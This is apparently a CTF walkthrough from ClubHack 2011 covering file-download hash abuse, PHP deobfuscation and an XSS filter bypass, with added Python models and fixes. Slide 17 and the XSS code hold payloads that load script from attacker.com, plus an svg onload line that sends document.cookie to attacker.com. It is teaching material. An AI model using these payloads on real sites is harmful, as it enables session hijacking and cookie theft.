3. Introduction to CTF
CTF stands for Capture the Flag
Types:
Pre-conference
Educational
Web based
Exploitation
Web + Exploitation
Teams / Individuals
Offensive / Defensive
4. ClubHack 2011 preCON CTF
Free conference entry
Qualified to play Treasure Hunt @ClubHack
Physical CTF
Web Based
5. Tools
Mozilla Firefox
Add-on: Tamper Data
Web Server with PHP
Brain
Time
Patience
6. Execution
Register for the event
Access CTF site
Gather Information & Analyze
Look for hidden treasures
Get the Flag and Submit
7. Stage - 1
Information Gathering
Download.html
Can be used to download files from the server
Two params: filename & some HASH
How important is the hash for the file download?
What type of hash is it?
How to generate it?
UserLogin.html
Auth Bypass
Guessable Logins
What else ???
8. Stage - 1
Analysis
Download.html
Need hash to download file
Hash is SHA1
How to generate it?
UserLogin.html
No SQLi
No Auth Bypass
No Guessable Login
Brute Force ???
9. Stage - 2
Deep Inspection
Found ‘execute.php’ in source of download.html
Looks like a command utility
OS commanding ???
Analysis
No OS command execution
“Wonly one command”
Commands which take a ‘file’ as parameter???
Single Command
sha1sum
10. Stage - 3
Something to work on
Hash generation – execute.php
File Download – download.php
Login – UserLogin.php
Try to download files
Download.php
Execute.php
UserLogin.php
Analysis
Only ‘UserLogin.php’ can be downloaded
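Stages 1 to 3 above describe a download endpoint whose hash parameter turned out to be exactly what execute.php would compute for any file: the SHA-1 of its contents. The Python below is an added example, not code from the slides or from the ClubHack challenge. It models the two endpoints on an in-memory web root, shows the chain that recovers UserLogin.php, and places a hardened variant next to it. The file contents, the readme.txt entry, the HMAC token design and the allowlist are assumptions; the model also does not reproduce whatever stopped download.php and execute.php themselves from being fetched, which the deck does not explain.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Constructed stand-in for the CTF web root. Only the three script names come
# from the slides; the contents and readme.txt are made up for the example.
WEBROOT = {
    "UserLogin.php": b"<?php /* obfuscated login form handler */ ?>",
    "download.php": b"<?php /* serves a file when the hash parameter matches */ ?>",
    "execute.php": b"<?php /* runs exactly one command: sha1sum */ ?>",
    "readme.txt": b"Welcome to the treasure hunt.",
}


def execute(command: str, filename: str) -> str:
    """Model of execute.php: no general OS commanding, only `sha1sum <file>`."""
    if command != "sha1sum":
        raise PermissionError("only one command is allowed")
    if filename not in WEBROOT:
        raise FileNotFoundError(filename)
    return hashlib.sha1(WEBROOT[filename]).hexdigest()


def download_vulnerable(filename: str, digest: str) -> Optional[bytes]:
    """Model of download.php: the hash parameter must equal the SHA-1 of the
    file's contents. That value is not a secret: anything that can hash the
    file (here, execute.php) can mint a valid one for any file."""
    data = WEBROOT.get(filename)
    if data is None or hashlib.sha1(data).hexdigest() != digest:
        return None
    return data


def read_source_via_chain(filename: str) -> Optional[bytes]:
    """Stage 3 chain: ask execute.php for the digest, hand it to download.php."""
    return download_vulnerable(filename, execute("sha1sum", filename))


# Hardened variant (assumed design, not from the slides): the token is an HMAC
# under a server-side secret over the filename, so only the server can issue
# it, and only an explicit allowlist of files is downloadable at all.
SERVER_SECRET = secrets.token_bytes(32)
DOWNLOADABLE = {"readme.txt"}


def issue_token(filename: str) -> str:
    """Server-side only: requires SERVER_SECRET, which clients never see."""
    return hmac.new(SERVER_SECRET, filename.encode(), hashlib.sha256).hexdigest()


def download_hardened(filename: str, token: str) -> Optional[bytes]:
    if filename not in DOWNLOADABLE:
        return None
    if not hmac.compare_digest(issue_token(filename), token):
        return None
    return WEBROOT[filename]


if __name__ == "__main__":
    print(read_source_via_chain("UserLogin.php"))
    print(download_hardened("UserLogin.php", execute("sha1sum", "UserLogin.php")))
```

The lesson is independent of the hash algorithm: a check that the client can recompute on its own is a checksum, not an authorization token, and upgrading SHA-1 to SHA-256 would not have changed the outcome.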
11. Stage - 4
Obfuscated PHP Code
UserLogin.php is obfuscated
“Free Online PHP Obfuscator v1.2: http://www.fopo.com.ar”
No Online de-obfuscation tool available
I was not able to find one
Analysis
Go Manual Mode !!
Create scripts
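The deck says the obfuscated UserLogin.php was taken apart by hand with home-made scripts, but it does not reproduce the file or the layering that FOPO v1.2 used. The Python below is an added example of the general technique, not the speaker's script and not a FOPO-specific decoder: it inlines hex-escaped string variables, then repeatedly peels `eval(decoder(decoder("...")))` layers built from base64_decode, gzinflate, gzuncompress, str_rot13 and strrev, the decoders such obfuscators usually chain. The two-layer sample it works on is constructed inside the block and is not real FOPO output.

```python
import base64
import codecs
import re
import zlib
from typing import Optional, Tuple

# PHP decoders that eval-based obfuscators chain. They operate on bytes because
# gzinflate output is binary until the last layer is reached.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -zlib.MAX_WBITS),  # raw DEFLATE
    "gzuncompress": zlib.decompress,                               # zlib-wrapped
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot_13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
STRING_ASSIGN = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;\s*')
# eval( fn1( fn2( "literal" ) ) );  optionally wrapped in <?php ... ?>
EVAL_LAYER = re.compile(
    r'^\s*(?:<\?php\s*)?eval\s*\(\s*((?:\w+\s*\(\s*)*)"([^"]*)"\s*\)+\s*;?\s*(?:\?>)?\s*$',
    re.S,
)


def unescape_hex(literal: str) -> str:
    r"""Turn "\x65\x76\x61\x6c" into eval so hidden function names become readable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def inline_string_vars(php: str) -> str:
    """Resolve `$f = "<hex>"; ... $f($d)` into a direct call on a literal argument."""
    values = {}

    def grab(m):
        values[m.group(1)] = unescape_hex(m.group(2))
        return ""

    body = STRING_ASSIGN.sub(grab, php)
    for var, value in values.items():
        # call position:  $b(   ->  base64_decode(
        body = re.sub(r"\$" + re.escape(var) + r"\s*\(", lambda m, v=value: v + "(", body)
        # argument position:  $d  ->  "payload"
        body = re.sub(r"\$" + re.escape(var) + r"\b", lambda m, v=value: '"' + v + '"', body)
    return body


def peel_once(php: str) -> Optional[str]:
    """Strip one eval(...) wrapper; None when the text is not such a wrapper."""
    m = EVAL_LAYER.match(inline_string_vars(php))
    if m is None:
        return None
    chain = re.findall(r"\w+", m.group(1))  # e.g. ['base64_decode', 'str_rot13']
    data = m.group(2).encode("latin-1")
    for fn in reversed(chain):              # PHP evaluates the innermost call first
        if fn not in DECODERS:
            raise ValueError(f"unknown decoder in chain: {fn}")
        data = DECODERS[fn](data)
    return data.decode("latin-1")


def deobfuscate(php: str, max_layers: int = 20) -> Tuple[str, int]:
    """Peel eval layers until plain code remains; returns (code, layers_removed)."""
    layers = 0
    while layers < max_layers:
        inner = peel_once(php)
        if inner is None:
            break
        php, layers = inner, layers + 1
    return php, layers


# Constructed sample. The login logic is invented and the layering is a generic
# eval/base64/gzinflate/str_rot13 stack, NOT real FOPO v1.2 output.
PLAINTEXT = '<?php if ($_POST["user"] === "admin" && $_POST["pass"] === "s3cret") echo "ok"; ?>'


def _deflate_raw(data: bytes) -> bytes:
    c = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def build_sample() -> str:
    inner = b'eval(gzinflate(base64_decode("' + base64.b64encode(_deflate_raw(PLAINTEXT.encode())) + b'")));'
    payload = codecs.encode(base64.b64encode(inner).decode(), "rot_13")
    hx = lambda s: "".join(f"\\x{ord(ch):02x}" for ch in s)  # hide names as "\x.." escapes
    return f'<?php $a = "{hx("str_rot13")}"; $b = "{hx("base64_decode")}"; $d = "{payload}"; eval($b($a($d))); ?>'


if __name__ == "__main__":
    code, layers = deobfuscate(build_sample())
    print(f"removed {layers} layers:\n{code}")
```

The same job can be done by replacing each `eval` with `echo` and running PHP locally, but decoding offline means the obfuscated code never executes, which matters when the sample is hostile rather than a CTF artefact.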
14. Stage – 6: Final
Information Gathering
POST form
Looks like mail client
Hard-coded email addresses & Subject
Message is the only available space for User Input
Analysis
Tamper ‘TO’ email address & ‘Subject’
Test ‘Message’ for SQLi, Code Injection, …
What else ???
15. Stage – 6: Final
Damn… It's a ROCK!!!!
No server-side bug
Code Injection
SQLi
Only XSS
No <script> & <img>
Maybe flag.txt
Maybe messages.txt || mail.txt || sec*.txt
16. Stage – 6: Final
A Ray of Hope
Tweet from @ClubHack
Only “XSS”
Never seen XSS in CTF
What to exploit?
Myself??
Event Handlers
document.cookie
Did they mean “Some Cookie”?
17. Final
After 2 days
Got Flag & Submit link
Free entry to ClubHack -> Secured !!
Payloads Used:
<ScRiPt src="http://attacker.com/evil.js"></script> (me)
<scr<script>ipt src="http://attacker.com/evil.js"></script> (Vishal Oza)
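Slides 15 to 17 give the final-stage filter only by its effects: `<script>` and `<img>` were rejected, and the two payloads above got through. The Python below is an added example, not the challenge's PHP or the speaker's code. It models the filter as a literal, case-sensitive, single-pass blacklist (an assumption: the simplest filter that both reported payloads defeat), shows why each payload survives, adds the usual "recursive, case-insensitive" patch to show that nesting is fixed but the event-handler vector from slide 16 is not, and contrasts both with output encoding. The `<svg onload>` payload and the cookie-stealing URL are constructed for the example; attacker.com is the placeholder host from the slides.

```python
import html
import re


def blacklist_filter(message: str) -> str:
    """Assumed original filter: PHP str_replace semantics (exact, case-sensitive, one pass)."""
    return message.replace("<script>", "").replace("<img>", "")


TAG = re.compile(r"</?(?:script|img)\b[^>]*>", re.I)


def recursive_blacklist_filter(message: str) -> str:
    """Typical patch that keeps the blacklist idea: case-insensitive, tolerates
    attributes, and repeats until nothing changes (kills the <scr<script>ipt trick)."""
    while True:
        stripped = TAG.sub("", message)
        if stripped == message:
            return stripped
        message = stripped


def render_message(message: str) -> str:
    """The actual fix: the message is text, so encode it for the HTML context
    instead of enumerating dangerous tags."""
    return f'<p class="message">{html.escape(message, quote=True)}</p>'


# Would a browser execute something in this fragment? A script element, or any
# element carrying an inline event-handler attribute (the vector slide 16 hints at).
EXECUTABLE = re.compile(r"<script\b|<[a-z][^>]*\son\w+\s*=", re.I)


def is_executable(fragment: str) -> bool:
    return EXECUTABLE.search(fragment) is not None


# The two payloads from the slides (quotes normalised to ASCII) plus one
# constructed event-handler payload to show where tag blacklisting ends.
PAYLOADS = {
    "case_variation": '<ScRiPt src="http://attacker.com/evil.js"></script>',
    "nested_tag": '<scr<script>ipt src="http://attacker.com/evil.js"></script>',
    "event_handler": '<svg onload="location=\'http://attacker.com/?c=\'+document.cookie">',
}

TREATMENTS = {
    "blacklist": blacklist_filter,
    "recursive_blacklist": recursive_blacklist_filter,
    "encode": render_message,
}


def evaluate() -> dict:
    """For every payload and treatment: True if the result would still execute."""
    return {
        name: {label: is_executable(fn(payload)) for label, fn in TREATMENTS.items()}
        for name, payload in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, row in evaluate().items():
        print(f"{name:16s}", {k: ("EXECUTES" if v else "inert") for k, v in row.items()})
```

The case-variation payload never matches the literal `<script>`, and the nested payload is reassembled by the single pass that removes its inner `<script>`. The recursive filter closes both holes and still lets `<svg onload>` through, which is the general argument for encoding on output rather than filtering on input.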
18. Thanks/Questions
webDEViL
CTF Creation and Access for “Live Demo”
ClubHack
Organizing CTF challenge
For Gifts !!!
http://twitter.com/amolnaik4